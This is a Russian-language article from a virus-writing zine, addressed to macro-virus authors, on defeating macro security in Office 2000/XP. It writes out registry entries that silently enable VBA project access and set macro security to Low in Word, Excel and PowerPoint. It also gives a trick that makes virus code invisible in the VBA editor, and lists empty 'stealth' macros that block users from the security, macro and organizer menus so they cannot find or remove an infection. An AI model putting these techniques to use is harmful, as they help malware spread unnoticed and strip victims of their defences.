/*-----------------------------------------------------------------------*/
/* R I N G 0, I S S U E # 1 */
/*-----------------------------------------------------------------------*/
О макро вирусах в Office 2000/XP
by VOVAN // SMF
В последнее время фирма мелкомягких занялась борьбой с макро вирусами
это заметно и на продукте Office 2000/XP ихние цифровые подписи и
сертификаты не дают спокойно размножаться макро вирусам.
Как известно больше всего они хотели защитить Office 2000 Для этого они
сделали три степени защиты. Высокая, при которой все, не подписанные,
макросы отключаются без запроса Средняя, при которой на экран выводится
сообщение о присутствии макросов в доке Низкая, при которой макросы
выполняются без запроса По умолчанию в Worde 2000 стоит Высокая степень
защиты.
Такие же дела обстоят и в Excel 2000, но более благоприятные, чем в
Worde 2000 По умолчанию там стоит Средняя степень защиты, что даёт шанс.
Тоже самое и в PowerPointe 2000
Делаем выводы, нужно делать кросс платформенные вирусы, дабы проникнуть
во все приложения мелкомягких, в том числе и в Word 2000.
VBS<-->HTML
Схема проникновения в Office 200 \/
Excel===>Word<===PowerPoint
В Office XP для всех приложений стоит высокий уровень защиты!
Схема проникновения в Office XP VBS<-->HTML
\/
|
/|\
/ | \
/ | \
Excel=>Word<=PowerPoint
Но эти мелкомягкие позаботились даже от проникновения из вне дабы не
дать, к примеру, VBS вирусу проникнуть в Word или Excel т.д. А дело вот
в чем в Worde XP, как и в других приложениях появилась некая функция ее
можно увидеть, зайдя в меню "Сервис"->"Макрос"->"Безопасность..."->
"Надежные источники" то в низу меню можно заметить два пункта на первом
стоит галочка по умолчанию, а вот на втором "Доверять доступ к Visual
Basic Project" который как раз нам и нужен, позарез галочки нет, а без
нее в Office XP кросс платформенный вирус ничего ни сделает при попытки
проникнуть в шаблон из другого приложения появится такое вот критическое
окошко с надписью
"Отсутствует доверие к программируемому доступу к проекту Visual Basic."
Эту проблему можно решить очень простым способом установить доверие к
доступу Visual Basic через реестр.
Вот команды для Word XP
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security]
"AccessVBOM"=dword:00000001
А также установить низкую защиту от макро вирусов, при которой они
будут выполнять без запроса.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
для Word 2000
Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001
для Excel XP
Разрешить доступ к Visual Basic
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Excel\Security]
"AccessVBOM"=dword:00000001
Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Excel\Security]
"Level"=dword:00000001
для Excel 2000
Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Excel\Security]
"Level"=dword:00000001
для PowerPoint XP
Разрешить доступ к Visual Basic
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\PowerPoint\Security]
"AccessVBOM"=dword:00000001
Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\PowerPoint\Security]
"Level"=dword:00000001
для PowerPoint 2000
Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\PowerPoint\Security]
"Level"=dword:00000001
Также можно применить стелс прием для сокрытия кода в редакторе Visual
Basic Суть его работы заключается в том, чтобы сделать все символы в
редакторе Visual Basic белыми под цвет фона это можно легко сделать с
помощью параметров в реестре.
Office 2000/XP
~~~~~~~~~~~~~~
[HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common]
"CodeBackColors"="1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
[HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common]
"CodeForeColors"="1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
Следующий параметр нужен удаления разделяющей полосы между макросами
[HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common]
"EndProcLine"=dword:00000000
Также в Office 2000/XP появились новые стелс макросы
Sub ViewSecurity()
End Sub
Этот макрос срабатывает при активизации меню
"Сервис"->"Макрос"->"Безопасность..."
Sub ToolsOptionsSecutity()
End Sub
Этот макрос срабатывает при активизации окна Безопасность, где можно
установить уровень безопасности для активного документа.
Уже известные стелс макросы
Sub ToolsOptions()
End Sub
Не дает зайти в меню "Сервис"->"Параметры..." где можно установить
запрос на сохранение шаблона Normal.dot, что может существенно
затруднить работу вируса а также менять каталоги автозагрузки шаблонов.
Sub Organizer()
End Sub
Не дает зайти в Организатор, где можно увидеть модули вируса и удалять
их переименовывать и копировать.
Sub ToolsCustomize()
End Sub
Не дает зайти в меню "Сервис"->"Настройка..." где можно восстановить
скрытые панели инструментов, а также увидеть макросы в модулях.
Sub ToolsRecordMacroToggle()
End Sub
Не дает создать, и записывать макрос.
Sub ToolsRecordMacroStart()
End Sub
Не дает записывать макрос.
Sub FileTemplates()
End Sub
Не дает зайти в меню "Сервис"->"Шаблоны и надстройки..." где можно
подключить свой собственный шаблон или отключить дополнительный шаблон
созданный вирусом.
Sub ToolsMacro()
End Sub
Не дает зайти в меню "Макрос"->"Макросы" где можно увидеть макросы и
модули, а также запустить, удалить, редактировать и вызвать Организатор.
Sub ViewVBcode()
End Sub
Не дает загрузить Редактор Visual Basic, где можно увидеть модули и
макросы, а также их изменить и удалить.
Вот и все не забывайте получить доверие к доступу Visual Basic через
реестр!
